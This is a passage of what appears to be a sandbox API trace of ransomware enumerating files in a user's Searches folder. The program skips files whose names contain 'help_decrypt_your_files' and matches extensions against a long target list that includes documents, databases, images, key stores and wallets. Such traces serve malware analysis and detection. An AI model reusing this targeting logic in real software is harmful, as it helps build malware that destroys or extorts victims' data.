	[0198.801] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ini") returned 0x0
	[0198.801] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x437a1142, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437a1142, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437a1142, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1
	[0198.801] lstrcmpW (lpString1="Everywhere.search-ms", lpString2="..") returned 1
	[0198.802] lstrcmpW (lpString1="Everywhere.search-ms", lpString2=".") returned 1
	[0198.802] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Searches\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Searches\\") returned="C:\\Users\\RDhJ0CNFevzX\\Searches\\"
	[0198.802] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Searches\\", lpString2="Everywhere.search-ms" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Searches\\Everywhere.search-ms") returned="C:\\Users\\RDhJ0CNFevzX\\Searches\\Everywhere.search-ms"
	[0198.802] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Searches\\Everywhere.search-ms") returned 51
	[0198.802] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0198.802] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Searches\\Everywhere.search-ms", cchLength=0x33 | out: lpsz="c:\\users\\rdhj0cnfevzx\\searches\\everywhere.search-ms") returned 0x33
	[0198.802] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.802] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\searches\\everywhere.search-ms", lpSrch="help_decrypt_your_files") returned 0x0
	[0198.803] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\searches\\everywhere.search-ms" | out: lpString1="c:\\users\\rdhj0cnfevzx\\searches\\everywhere.search-ms") returned="c:\\users\\rdhj0cnfevzx\\searches\\everywhere.search-ms"
	[0198.803] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\searches\\everywhere.search-ms") returned 51
	[0198.803] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0198.803] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.803] StrStrW (lpFirst=".search-ms", lpSrch=".") returned=".search-ms"
	[0198.803] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.804] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".search-ms") returned 0x0
	[0198.804] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x4377acca, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4377acca, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4377acca, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1
	[0198.804] lstrcmpW (lpString1="Indexed Locations.search-ms", lpString2="..") returned 1
	[0198.804] lstrcmpW (lpString1="Indexed Locations.search-ms", lpString2=".") returned 1
	[0198.804] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Searches\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Searches\\") returned="C:\\Users\\RDhJ0CNFevzX\\Searches\\"
	[0198.804] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Searches\\", lpString2="Indexed Locations.search-ms" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Searches\\Indexed Locations.search-ms") returned="C:\\Users\\RDhJ0CNFevzX\\Searches\\Indexed Locations.search-ms"
	[0198.804] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Searches\\Indexed Locations.search-ms") returned 58
	[0198.804] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0198.805] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Searches\\Indexed Locations.search-ms", cchLength=0x3a | out: lpsz="c:\\users\\rdhj0cnfevzx\\searches\\indexed locations.search-ms") returned 0x3a
	[0198.805] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.805] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\searches\\indexed locations.search-ms", lpSrch="help_decrypt_your_files") returned 0x0
	[0198.805] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\searches\\indexed locations.search-ms" | out: lpString1="c:\\users\\rdhj0cnfevzx\\searches\\indexed locations.search-ms") returned="c:\\users\\rdhj0cnfevzx\\searches\\indexed locations.search-ms"
	[0198.805] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\searches\\indexed locations.search-ms") returned 58
	[0198.805] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0198.805] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.806] StrStrW (lpFirst=".search-ms", lpSrch=".") returned=".search-ms"
	[0198.806] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.806] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gs